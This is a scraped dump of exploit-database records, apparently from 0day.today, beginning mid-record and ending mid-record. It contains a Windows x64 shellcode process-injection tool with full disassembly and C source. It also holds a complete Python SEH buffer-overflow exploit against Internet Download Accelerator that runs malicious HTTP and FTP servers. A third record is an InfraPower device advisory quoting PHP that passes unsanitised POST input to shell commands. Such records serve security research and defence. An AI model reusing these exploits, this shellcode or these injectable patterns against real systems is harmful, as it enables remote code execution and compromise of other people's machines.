0x1c(%rbx),%esi\r\n a0: 48 01 fe add %rdi,%rsi\r\n a3: 99 cltd \r\n a4: 52 push %rdx\r\n a5: 66 ba 40 03 mov $0x340,%dx\r\n a9: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n ac: 48 01 fb add %rdi,%rbx\r\n af: c7 04 24 6d 73 76 63 movl $0x6376736d,(%rsp)\r\n b6: 66 c7 44 24 04 72 74 movw $0x7472,0x4(%rsp)\r\n bd: 48 8d 0c 24 lea (%rsp),%rcx\r\n c1: 48 83 ec 58 sub $0x58,%rsp\r\n c5: ff d3 callq *%rbx\r\n c7: 48 8d 54 24 58 lea 0x58(%rsp),%rdx\r\n cc: c7 02 73 74 72 63 movl $0x63727473,(%rdx)\r\n d2: 66 c7 42 04 6d 70 movw $0x706d,0x4(%rdx)\r\n d8: 48 89 c1 mov %rax,%rcx\r\n db: 66 41 b8 2c 09 mov $0x92c,%r8w\r\n e0: 42 8b 1c 06 mov (%rsi,%r8,1),%ebx\r\n e4: 48 01 fb add %rdi,%rbx\r\n e7: ff d3 callq *%rbx\r\n e9: 49 89 44 24 18 mov %rax,0x18(%r12)\r\n ee: 66 ba f8 02 mov $0x2f8,%dx\r\n f2: 8b 1c 16 mov (%rsi,%rdx,1),%ebx\r\n f5: 48 01 fb add %rdi,%rbx\r\n f8: 48 31 d2 xor %rdx,%rdx\r\n fb: 6a 02 pushq $0x2\r\n fd: 59 pop %rcx\r\n fe: ff d3 callq *%rbx\r\n 100: 49 89 c5 mov %rax,%r13\r\n 103: 49 83 fd ff cmp $0xffffffffffffffff,%r13\r\n 107: 74 60 je 169 <__exit>\r\n 109: 66 ba 30 01 mov $0x130,%dx\r\n 10d: 41 89 54 24 20 mov %edx,0x20(%r12)\r\n 112: 66 ba 60 0e mov $0xe60,%dx\r\n 116: 8b 1c 16 mov (%rsi,%rdx,1),%ebx\r\n 119: 48 01 fb add %rdi,%rbx\r\n 11c: 49 8d 54 24 20 lea 0x20(%r12),%rdx\r\n 121: 4c 89 e9 mov %r13,%rcx\r\n 124: ff d3 callq *%rbx\r\n 126: 48 83 f8 01 cmp $0x1,%rax\r\n 12a: 75 3d jne 169 <__exit>\r\n 12c: 48 31 d2 xor %rdx,%rdx\r\n 12f: 66 ba 68 0e mov $0xe68,%dx\r\n 133: 44 8b 3c 16 mov (%rsi,%rdx,1),%r15d\r\n 137: 49 01 ff add %rdi,%r15\r\n 13a: 48 83 ec 58 sub $0x58,%rsp\r\n \r\n000000000000013e <get_pid>:\r\n 13e: 49 8d 4c 24 4c lea 0x4c(%r12),%rcx\r\n 143: 49 8b 14 24 mov (%r12),%rdx\r\n 147: 49 8b 5c 24 18 mov 0x18(%r12),%rbx\r\n 14c: ff d3 callq *%rbx\r\n 14e: 48 31 d2 xor %rdx,%rdx\r\n 151: 48 39 d0 cmp %rdx,%rax\r\n 154: 74 24 je 17a <inject>\r\n 156: 4c 89 e9 mov %r13,%rcx\r\n 159: 49 8d 54 24 20 lea 0x20(%r12),%rdx\r\n 15e: 41 ff d7 callq *%r15\r\n 161: 48 83 f8 01 cmp $0x1,%rax\r\n 165: 74 d7 je 13e <get_pid>\r\n 167: c9 leaveq \r\n 168: c3 retq \r\n \r\n0000000000000169 <__exit>:\r\n 169: 48 31 d2 xor %rdx,%rdx\r\n 16c: 52 push %rdx\r\n 16d: 66 ba a4 04 mov $0x4a4,%dx\r\n 171: 8b 1c 16 mov (%rsi,%rdx,1),%ebx\r\n 174: 48 01 fb add %rdi,%rbx\r\n 177: 59 pop %rcx\r\n 178: ff d3 callq *%rbx\r\n \r\n000000000000017a <inject>:\r\n 17a: 48 31 d2 xor %rdx,%rdx\r\n 17d: 52 push %rdx\r\n 17e: 41 5a pop %r10\r\n 180: 66 41 ba 0c 0e mov $0xe0c,%r10w\r\n 185: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx\r\n 189: 48 01 fb add %rdi,%rbx\r\n 18c: 52 push %rdx\r\n 18d: 59 pop %rcx\r\n 18e: 45 8b 44 24 28 mov 0x28(%r12),%r8d\r\n 193: b9 0a 80 84 1e mov $0x1e84800a,%ecx\r\n 198: 81 e9 0b 70 65 1e sub $0x1e65700b,%ecx\r\n 19e: ff d3 callq *%rbx\r\n 1a0: 49 89 c5 mov %rax,%r13\r\n 1a3: 49 83 fd ff cmp $0xffffffffffffffff,%r13\r\n 1a7: 74 c0 je 169 <__exit>\r\n 1a9: 66 ba ff 04 mov $0x4ff,%dx\r\n 1ad: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 1b0: 48 01 fb add %rdi,%rbx\r\n 1b3: 48 83 ec 58 sub $0x58,%rsp\r\n 1b7: 4c 89 e9 mov %r13,%rcx\r\n 1ba: 48 31 d2 xor %rdx,%rdx\r\n 1bd: 4d 8b 44 24 10 mov 0x10(%r12),%r8\r\n 1c2: 66 41 b9 ff 2f mov $0x2fff,%r9w\r\n 1c7: 49 ff c1 inc %r9\r\n 1ca: c6 44 24 20 04 movb $0x4,0x20(%rsp)\r\n 1cf: ff d3 callq *%rbx\r\n 1d1: 49 89 c6 mov %rax,%r14\r\n 1d4: 48 31 d2 xor %rdx,%rdx\r\n 1d7: 48 39 d0 cmp %rdx,%rax\r\n 1da: 74 8d je 169 <__exit>\r\n 1dc: 66 ba 43 05 mov $0x543,%dx\r\n 1e0: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 1e3: 48 01 fb add %rdi,%rbx\r\n 1e6: 48 83 ec 58 sub $0x58,%rsp\r\n 1ea: 48 31 d2 xor %rdx,%rdx\r\n 1ed: 48 89 54 24 20 mov %rdx,0x20(%rsp)\r\n 1f2: 4c 89 e9 mov %r13,%rcx\r\n 1f5: 4c 89 f2 mov %r14,%rdx\r\n 1f8: 4d 8b 44 24 08 mov 0x8(%r12),%r8\r\n 1fd: 4d 8b 4c 24 10 mov 0x10(%r12),%r9\r\n 202: ff d3 callq *%rbx\r\n 204: 48 83 f8 01 cmp $0x1,%rax\r\n 208: 0f 85 5b ff ff ff jne 169 <__exit>\r\n 20e: 66 ba a8 02 mov $0x2a8,%dx\r\n 212: 8b 1c 16 mov (%rsi,%rdx,1),%ebx\r\n 215: 48 01 fb add %rdi,%rbx\r\n 218: 48 31 d2 xor %rdx,%rdx\r\n 21b: 48 83 ec 58 sub $0x58,%rsp\r\n 21f: 4c 89 e9 mov %r13,%rcx\r\n 222: 52 push %rdx\r\n 223: 52 push %rdx\r\n 224: 41 58 pop %r8\r\n 226: 66 ba 40 03 mov $0x340,%dx\r\n 22a: 44 8b 0c 96 mov (%rsi,%rdx,4),%r9d\r\n 22e: 49 01 f9 add %rdi,%r9\r\n 231: 5a pop %rdx\r\n 232: 4c 89 74 24 20 mov %r14,0x20(%rsp)\r\n 237: 4c 89 44 24 28 mov %r8,0x28(%rsp)\r\n 23c: 4c 89 44 24 30 mov %r8,0x30(%rsp)\r\n 241: ff d3 callq *%rbx\r\n 243: e8 21 ff ff ff callq 169 <__exit>\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n#include<stdio.h>\r\n#include<windows.h>\r\n#include<TlHelp32.h>\r\n#include<string.h>\r\n \r\n \r\nchar shellcode[]=\"\\x4d\\x31\\xc0\\x41\\x50\\x41\\x50\\xc7\\x04\\x24\\x65\\x78\\x70\\x6c\\xc7\\x44\\x24\\x04\\x6f\\x72\\x65\\x72\\xc7\\x44\\x24\\x08\\x2e\\x65\\x78\\x65\\x48\\x8d\\x0c\\x24\\x41\\x50\\x41\\x50\\x41\\x50\\xc7\\x04\\x24\\x43\\x3a\\x5c\\x55\\xc7\\x44\\x24\\x04\\x73\\x65\\x72\\x73\\xc7\\x44\\x24\\x08\\x5c\\x50\\x75\\x62\\xc7\\x44\\x24\\x0c\\x6c\\x69\\x63\\x5c\\xc7\\x44\\x24\\x10\\x69\\x6e\\x2e\\x64\\x66\\xc7\\x44\\x24\\x14\\x6c\\x6c\\x48\\x8d\\x14\\x24\\x66\\x41\\xb8\\x50\\x01\\x4c\\x29\\xc4\\x4c\\x8d\\x24\\x24\\x6a\\x18\\x41\\x58\\x49\\x89\\x0c\\x24\\x49\\x89\\x54\\x24\\x08\\x4d\\x89\\x44\\x24\\x10\\x99\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x40\\x18\\x48\\x8b\\x70\\x10\\x48\\xad\\x48\\x8b\\x30\\x48\\x8b\\x7e\\x30\\xb2\\x88\\x8b\\x5f\\x3c\\x48\\x01\\xfb\\x8b\\x1c\\x13\\x48\\x01\\xfb\\x8b\\x73\\x1c\\x48\\x01\\xfe\\x99\\x52\\x66\\xba\\x40\\x03\\x8b\\x1c\\x96\\x48\\x01\\xfb\\xc7\\x04\\x24\\x6d\\x73\\x76\\x63\\x66\\xc7\\x44\\x24\\x04\\x72\\x74\\x48\\x8d\\x0c\\x24\\x48\\x83\\xec\\x58\\xff\\xd3\\x48\\x8d\\x54\\x24\\x58\\xc7\\x02\\x73\\x74\\x72\\x63\\x66\\xc7\\x42\\x04\\x6d\\x70\\x48\\x89\\xc1\\x66\\x41\\xb8\\x2c\\x09\\x42\\x8b\\x1c\\x06\\x48\\x01\\xfb\\xff\\xd3\\x49\\x89\\x44\\x24\\x18\\x66\\xba\\xf8\\x02\\x8b\\x1c\\x16\\x48\\x01\\xfb\\x48\\x31\\xd2\\x6a\\x02\\x59\\xff\\xd3\\x49\\x89\\xc5\\x49\\x83\\xfd\\xff\\x74\\x60\\x66\\xba\\x30\\x01\\x41\\x89\\x54\\x24\\x20\\x66\\xba\\x60\\x0e\\x8b\\x1c\\x16\\x48\\x01\\xfb\\x49\\x8d\\x54\\x24\\x20\\x4c\\x89\\xe9\\xff\\xd3\\x48\\x83\\xf8\\x01\\x75\\x3d\\x48\\x31\\xd2\\x66\\xba\\x68\\x0e\\x44\\x8b\\x3c\\x16\\x49\\x01\\xff\\x48\\x83\\xec\\x58\\x49\\x8d\\x4c\\x24\\x4c\\x49\\x8b\\x14\\x24\\x49\\x8b\\x5c\\x24\\x18\\xff\\xd3\\x48\\x31\\xd2\\x48\\x39\\xd0\\x74\\x24\\x4c\\x89\\xe9\\x49\\x8d\\x54\\x24\\x20\\x41\\xff\\xd7\\x48\\x83\\xf8\\x01\\x74\\xd7\\xc9\\xc3\\x48\\x31\\xd2\\x52\\x66\\xba\\xa4\\x04\\x8b\\x1c\\x16\\x48\\x01\\xfb\\x59\\xff\\xd3\\x48\\x31\\xd2\\x52\\x41\\x5a\\x66\\x41\\xba\\x0c\\x0e\\x42\\x8b\\x1c\\x16\\x48\\x01\\xfb\\x52\\x59\\x45\\x8b\\x44\\x24\\x28\\xb9\\x0a\\x80\\x84\\x1e\\x81\\xe9\\x0b\\x70\\x65\\x1e\\xff\\xd3\\x49\\x89\\xc5\\x49\\x83\\xfd\\xff\\x74\\xc0\\x66\\xba\\xff\\x04\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x48\\x83\\xec\\x58\\x4c\\x89\\xe9\\x48\\x31\\xd2\\x4d\\x8b\\x44\\x24\\x10\\x66\\x41\\xb9\\xff\\x2f\\x49\\xff\\xc1\\xc6\\x44\\x24\\x20\\x04\\xff\\xd3\\x49\\x89\\xc6\\x48\\x31\\xd2\\x48\\x39\\xd0\\x74\\x8d\\x66\\xba\\x43\\x05\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x48\\x83\\xec\\x58\\x48\\x31\\xd2\\x48\\x89\\x54\\x24\\x20\\x4c\\x89\\xe9\\x4c\\x89\\xf2\\x4d\\x8b\\x44\\x24\\x08\\x4d\\x8b\\x4c\\x24\\x10\\xff\\xd3\\x48\\x83\\xf8\\x01\\x0f\\x85\\x5b\\xff\\xff\\xff\\x66\\xba\\xa8\\x02\\x8b\\x1c\\x16\\x48\\x01\\xfb\\x48\\x31\\xd2\\x48\\x83\\xec\\x58\\x4c\\x89\\xe9\\x52\\x52\\x41\\x58\\x66\\xba\\x40\\x03\\x44\\x8b\\x0c\\x96\\x49\\x01\\xf9\\x5a\\x4c\\x89\\x74\\x24\\x20\\x4c\\x89\\x44\\x24\\x28\\x4c\\x89\\x44\\x24\\x30\\xff\\xd3\\xe8\\x21\\xff\\xff\\xff\";\r\n \r\n \r\nvoid inject(DWORD );\r\nint main(int i,char *a[])\r\n{\r\n if(i!=2)\r\n {\r\n printf(\"Usage %s <program name>\",a[0]);\r\n return 0;\r\n }\r\n \r\n BOOL f=0;\r\n HANDLE snap;\r\n PROCESSENTRY32 pe32;\r\n \r\n snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);\r\n \r\n if(snap==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"CreateToolhelp32Snapshot() Failed.\"); return 0;\r\n }\r\n \r\n pe32.dwSize=sizeof(pe32);\r\n \r\n if(!Process32First(snap,&pe32))\r\n {\r\n printf(\"Process32First() Failed.\"); return 0;\r\n }\r\n \r\n \r\n \r\n do\r\n {\r\n if(0==strncmp(a[1],pe32.szExeFile,strlen(pe32.szExeFile)))\r\n {\r\n f=TRUE;\r\n break;\r\n }\r\n \r\n }while(Process32Next(snap,&pe32));\r\n \r\n \r\n if(!f)\r\n {\r\n printf(\"No infomation found about \\\"%s\\\" \",a[1]);\r\n }\r\n else\r\n {\r\n printf(\"Program name:%s\\nProcess id: %d\",pe32.szExeFile,pe32.th32ProcessID);\r\n printf(\"\\nInjecting shellcode\");\r\n inject(pe32.th32ProcessID);\r\n }\r\n \r\n \r\n \r\n return 0;\r\n \r\n}\r\n \r\n \r\n \r\nvoid inject(DWORD pid)\r\n{\r\n HANDLE phd,h;\r\n LPVOID shell;\r\n \r\n phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);\r\n \r\n if(phd==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"\\nOpenProcess() Failed.\"); return ;\r\n }\r\n \r\n shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);\r\n if(shell==NULL)\r\n {\r\n printf(\"\\nVirtualAllocEx() Failed\"); return ; CloseHandle(phd);\r\n }\r\n \r\n WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);\r\n printf(\"\\nInjection successfull\\n\");\r\n printf(\"Running Shellcode......\\n\");\r\n \r\n h=CreateRemoteThread(phd,NULL,2046,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);\r\n if(h==NULL)\r\n {\r\n printf(\"Failed to Run Shellcode\\n\"); return ;\r\n }\r\n}\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/26704", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-17T03:04:16", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "Fady Mohammed Osman", "published": "2017-01-03T00:00:00", "title": "Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH) Exploit", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-01-03T00:00:00", "href": "https://0day.today/exploit/description/26605", "id": "1337DAY-ID-26605", "sourceData": "#!/usr/bin/python\r\n#\r\n# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit.\r\n# Exploit Author: Fady Mohamed Osman (@fady_osman)\r\n# Exploit-db : http://www.exploit-db.com/author/?a=2986\r\n# Youtube : https://www.youtube.com/user/cutehack3r\r\n# Date: Jan 2, 2017\r\n# Vendor Homepage: http://westbyte.com/\r\n# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator.\r\n# Version: 6.10.1.1527\r\n# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10.\r\n# --------------\r\n# Internet download accelerator suffers from a BOF when an FTP Download of file with\r\n# long name fails.\r\n# --------------\r\n# To Exploit this issue:\r\n# 1- Run HTTP server that will redirect to the FTP file with long name.\r\n# 2- The ftp server will answer to the commands sent then will open a data connection.\r\n# 3- The script will send an empty file list and close the connection to trigger the BOF condition.\r\n# 5- Happy new year :D.\r\n \r\nimport SocketServer\r\nimport threading\r\n \r\n \r\n# IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work.\r\nip = \"192.168.1.100\"\r\nipParts = ip.split(\".\")\r\nPasvResp = \"(\"+ ipParts[0]+ \",\" + ipParts[1]+ \",\" + ipParts[2] + \",\" + ipParts[3] + \",151,130)\"\r\n# Run Calc.exe\r\nbuf=(\"\\x31\\xF6\\x56\\x64\\x8B\\x76\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x1C\\x8B\"\r\n\"\\x6E\\x08\\x8B\\x36\\x8B\\x5D\\x3C\\x8B\\x5C\\x1D\\x78\\x01\\xEB\\x8B\"\r\n\"\\x4B\\x18\\x8B\\x7B\\x20\\x01\\xEF\\x8B\\x7C\\x8F\\xFC\\x01\\xEF\\x31\"\r\n\"\\xC0\\x99\\x32\\x17\\x66\\xC1\\xCA\\x01\\xAE\\x75\\xF7\\x66\\x81\\xFA\"\r\n\"\\x10\\xF5\\xE0\\xE2\\x75\\xCF\\x8B\\x53\\x24\\x01\\xEA\\x0F\\xB7\\x14\"\r\n\"\\x4A\\x8B\\x7B\\x1C\\x01\\xEF\\x03\\x2C\\x97\\x68\\x2E\\x65\\x78\\x65\"\r\n\"\\x68\\x63\\x61\\x6C\\x63\\x54\\x87\\x04\\x24\\x50\\xFF\\xD5\\xCC\")\r\n \r\n \r\n \r\n \r\n \r\nclass HTTPHandler(SocketServer.BaseRequestHandler):\r\n \"\"\"\r\n The request handler class for our HTTP server.\r\n \r\n This is just so we don't have to provide a suspicious FTP link with long name.\r\n \"\"\"\r\n \r\n def handle(self):\r\n # self.request is the TCP socket connected to the client\r\n self.data = self.request.recv(1024).strip()\r\n print \"[*] Recieved HTTP Request\"\r\n print \"[*] Sending Redirction To FTP\"\r\n # just send back the same data, but upper-cased\r\n # SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c\r\n payload = \"ftp://192.168.1.100/\"+ 'A' * 336 + \"\\xeb\\x06\\x90\\x90\" + \"\\x53\\x1b\\x01\\x10\" + buf + \"B\" * (1056 - len(buf))\r\n self.request.sendall(\"HTTP/1.1 302 Found\\r\\n\" +\r\n \"Host: Server\\r\\nConnection: close\\r\\nLocation: \"+\r\n payload+\r\n \"\\r\\nContent-type: text/html; charset=UTF-8\\r\\n\\r\\n\")\r\n print \"[*] Redirection Sent...\"\r\n \r\nclass FTPHandler(SocketServer.BaseRequestHandler):\r\n \"\"\"\r\n The request handler class for our FTP server.\r\n \r\n This will work normally and open a data connection with IDA.\r\n \"\"\"\r\n \r\n def handle(self):\r\n # User Command\r\n self.request.sendall(\"220 Nasty FTP Server Ready\\r\\n\")\r\n User = self.request.recv(1024).strip()\r\n print \"[*] Recieved User Command: \" + User\r\n self.request.sendall(\"331 User name okay, need password\\r\\n\") \r\n # PASS Command\r\n Pass = self.request.recv(1024).strip()\r\n print \"[*] Recieved PASS Command: \" + Pass\r\n self.request.sendall(\"230-Password accepted.\\r\\n230 User logged in.\\r\\n\")\r\n # SYST Command\r\n Syst = self.request.recv(1024).strip()\r\n print \"[*] Recieved SYST Command: \" + Syst\r\n self.request.sendall(\"215 UNIX Type: L8\\r\\n\")\r\n # TYPE Command\r\n Type = self.request.recv(1024).strip()\r\n print \"[*] Recieved Type Command: \" + Type\r\n self.request.sendall(\"200 Type set to I\\r\\n\")\r\n # REST command\r\n Rest = self.request.recv(1024).strip()\r\n print \"[*] Recieved Rest Command: \" + Rest\r\n self.request.sendall(\"200 OK\\r\\n\")\r\n # CWD command\r\n Cwd = self.request.recv(2048).strip()\r\n print \"[*] Recieved CWD Command: \" + Cwd\r\n self.request.sendall(\"250 CWD Command successful\\r\\n\")\r\n \r\n # PASV command.\r\n Pasv = self.request.recv(1024).strip()\r\n print \"[*] Recieved PASV Command: \" + Pasv\r\n self.request.sendall(\"227 Entering Passive Mode \" + PasvResp + \"\\r\\n\")\r\n \r\n #LIST \r\n List = self.request.recv(1024).strip()\r\n print \"[*] Recieved LIST Command: \" + List\r\n self.request.sendall(\"150 Here comes the directory listing.\\r\\n226 Directory send ok.\\r\\n\")\r\n \r\n \r\n \r\n \r\nclass FTPDataHandler(SocketServer.BaseRequestHandler):\r\n \"\"\"\r\n The request handler class for our FTP Data connection.\r\n \r\n This will send useless response and close the connection to trigger the error.\r\n \"\"\"\r\n \r\n def handle(self):\r\n # self.request is the TCP socket connected to the client\r\n print \"[*] Recieved FTP-Data Request\"\r\n print \"[*] Sending Empty List\"\r\n # just send back the same data, but upper-cased\r\n self.request.sendall(\"total 0\\r\\n\\r\\n\")\r\n self.request.close()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n HOST, PORT = ip, 8000\r\n SocketServer.TCPServer.allow_reuse_address = True\r\n \r\n print \"[*] Starting the HTTP Server.\"\r\n # Create the server, binding to localhost on port 8000\r\n HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler)\r\n \r\n # Running the http server (using a thread so we can continue and listen for FTP and FTP-Data).\r\n HTTPThread = threading.Thread(target=HTTPServer.serve_forever)\r\n HTTPThread.daemon = True\r\n HTTPThread.start()\r\n \r\n print \"[*] Starting the FTP Server.\"\r\n # Running the FTP server.\r\n FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler)\r\n \r\n # Running the FTP server thread.\r\n FTPThread = threading.Thread(target=FTPServer.serve_forever)\r\n FTPThread.daemon = True\r\n FTPThread.start()\r\n \r\n print \"[*] Opening the data connection.\"\r\n # Opening the FTP data connection - DON'T CHANGE THE PORT.\r\n FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler)\r\n \r\n # Running the FTP Data connection Thread.\r\n DataThread = threading.Thread(target=FTPData.serve_forever)\r\n DataThread.daemon = True\r\n DataThread.start()\r\n \r\n print \"[*] Listening for FTP Data.\"\r\n # Making the main thread wait.\r\n print \"[*] To exit the script please press any key at any time.\"\r\n raw_input()\n\n# 0day.today [2018-01-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26605"}, {"lastseen": "2018-04-09T07:42:44", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "LiquidWorm", "published": "2016-10-28T00:00:00", "type": "zdt", "title": "InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-10-28T00:00:00", "href": "https://0day.today/exploit/description/26156", "id": "1337DAY-ID-26156", "sourceData": "InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution\r\n \r\n \r\nVendor: Austin Hughes Electronics Ltd.\r\nProduct web page: http://www.austin-hughes.com\r\nAffected version: Q213V1 (Firmware: V2395S)\r\nFixed version: Q216V3 (Firmware: IPD-02-FW-v03)\r\n \r\nSummary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each\r\nIP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.\r\nPatented IP Dongle provides IP remote access to the PDUs by a true\r\nnetwork IP address chain. Only 1xIP dongle allows access to max. 16\r\nPDUs in daisy chain - which is a highly efficient cient application\r\nfor saving not only the IP remote accessories cost, but also the true\r\nIP addresses required on the PDU management.\r\n \r\nDesc: InfraPower suffers from multiple unauthenticated remote command\r\ninjection vulnerabilities. The vulnerability exist due to several POST\r\nparameters in several scripts not being sanitized when using the exec(),\r\nproc_open(), popen() and shell_exec() PHP function while updating the\r\nsettings on the affected device. This allows the attacker to execute\r\narbitrary system commands as the root user and bypass access controls in\r\nplace.\r\n \r\nTested on: Linux 2.6.28 (armv5tel)\r\n lighttpd/1.4.30-devel-1321\r\n PHP/5.3.9\r\n SQLite/3.7.10\r\n \r\n \r\nVulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5372\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php\r\n \r\n \r\n27.09.2016\r\n \r\n--\r\n \r\n \r\ndoupgrate.php:\r\n--------------\r\n \r\n \r\n09: <?\r\n10: echo \"Firmware Upgrate Using NFS:<BR>\";\r\n11: echo \"IP=\".$_POST[\"ipaddr\"].\"<BR>\";\r\n12: echo \"Firmware Name=\".$_POST[\"fwname\"].\"<BR>\";\r\n13: system(\"sh nfs.sh\");\r\n14: echo \"Mounting NFS<BR>\";\r\n15: system(\"mount -t nfs -o nolock \".$_POST[\"ipaddr\"].\":\".$_POST[\"nfsdir\"].\" /nfs\");\r\n16: system(\"cp /nfs/\".$_POST[\"fwname\"].\" /\");\r\n17: echo \"Flash erasing<BR>\";\r\n18: system(\"@flash_eraseall /dev/mtd0\");\r\n19: system(\"cp /\".$_POST[\"fwname\"].\" /dev/mtd0\");\r\n20: echo \"Upgrate done<BR>\";\r\n21: system(\"umount /nfs\");\r\n22: echo \"Reboot system<BR>\";\r\n23: system(\"reboot\");\r\n24: ?>\r\n \r\n---------------------------------------------------------------------\r\n \r\n \r\nIPSettings.php:\r\n---------------\r\n \r\n \r\n83: $IP_setting = ereg_ip($_POST['IP']);\r\n84: $Netmask_setting = ereg_ip($_POST['Netmask']);\r\n85: $Gateway_setting = ereg_ip($_POST['Gateway']);\r\n...\r\n...\r\n110: $fout = fopen(\"/mnt/mtd/net_conf\", \"w\");\r\n111: if($fout){\r\n112: $output = substr($output, 0, -1);\r\n113: fprintf($fout, \"%s\", $output);\r\n114: //echo $change_ip.'b';\r\n115: if($change_ip === '1'){\r\n116: $str = '';\r\n117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);\r\n118: // echo $str.\"\\n\";\r\n119: }\r\n120: if($change_gw === '1'){\r\n121: $str = '';\r\n122: exec('ip route del default', $str);\r\n123: exec('route add default gw '.$Gateway_setting, $str);\r\n124: // echo $str[0].\"a\\n\";\r\n125: }\r\n126: }\r\n127: fclose($fout);\r\n...\r\n...\r\n164: function ereg_ip($ipstring){ \r\n165: $ipstring=trim($ipstring); //\u79fb\u9664\u524d\u5f8c\u7a7a\u767d \r\n166: //\u683c\u5f0f\u932f\u8aa4 \r\n167: if(!ereg(\"^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$\",$ipstring))return 0; \r\n168: //\u5167\u5bb9\u6aa2\u67e5 \r\n169: $ip_segment =split(\"\\.\",$ipstring); //\u6ce8\u610f\u4e00\u5b9a\u8981\u52a0 \"\\\"\uff0c\u5426\u5247\u6703\u5206\u4e0d\u958b\u3002 \r\n170: foreach($ip_segment as $k =>$v){ \r\n171: if($v >255){ \r\n171: return 0; \r\n172: }\r\n173: $ip_segment[$k]=(int)$ip_segment[$k]; //\u6d88\u9664ip\u4e2d\u76840\uff0cex:1.020.003.004 =>1.20.3.4 \r\n174: } //end foreach \r\n175: $ipstring =\"$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]\"; //\u5c07\u5b57\u4e32$ip\u8655\u7406 \r\n176: return $ipstring; \r\n177: }\r\n \r\n---------------------------------------------------------------------\r\n \r\n \r\nLogin.php:\r\n----------\r\n \r\n \r\n126: $UserName = getConf(\"/mnt/mtd/web_conf\", \"UserName\");\r\n127: $Password = getConf(\"/mnt/mtd/web_conf\", \"Password\");\r\n128:\r\n129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;\r\n130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){\r\n...\r\n...\r\n140: $_SESSION['Login'] = $_POST['ID_User'];\r\n141: \r\n142: //Login\r\n143: $loginTime = date(\"Y-m-d,H:i:s.0,P\");\r\n144: $remoteIP = $_SERVER['REMOTE_ADDR'];\r\n145: //----------SNMP checking ---Ed 20130307------------------------<\r\n146: $SNMPEnable = getConf(\"/mnt/mtd/snmp_conf\", \"enable\");\r\n147: if ($SNMPEnable == \"1\") {\r\n148: $TrapEnable = getConf(\"/mnt/mtd/snmp_conf\", \"trap\");\r\n149: if ($TrapEnable == \"v2Trap\") {\r\n150: $trapTo = getConf(\"/mnt/mtd/snmp_conf\", \"IP\");\r\n151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \\'\\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s \"' . $loginTime . '\" InfraPower-MIB::userName s \"' . $_POST['ID_User'] . '\" InfraPower-MIB::webAccessIpAddress s \"' . $remoteIP . '\"');\r\n152: //echo \"alert($res);\";\r\n153: }\r\n154: }\r\n \r\n---------------------------------------------------------------------\r\n \r\n \r\nNtp.php:\r\n--------\r\n \r\n \r\n36: <?php\r\n37: if(empty($_POST['Change']))\r\n38: $tzone='8';\r\n39: else\r\n40: {\r\n41:\r\n42: $tzone=$_POST['ID_timezone'];\r\n43: $idx=$tzone+12;\r\n44: echo \"update status...\";\r\n45: exec(\"/usr/bin/ntpclient -s -h 220.130.158.71\");\r\n46: exec(\"/usr/bin/zonegen \".$idx);\r\n47: exec(\"/usr/bin/zic -d /usr/bin/ zonetime\");\r\n48: exec(\"mv /usr/bin/localtime /etc/localtime\");\r\n49: echo \"OK\"; \r\n50: }\r\n51: ?>\r\n \r\n---------------------------------------------------------------------\r\n \r\n 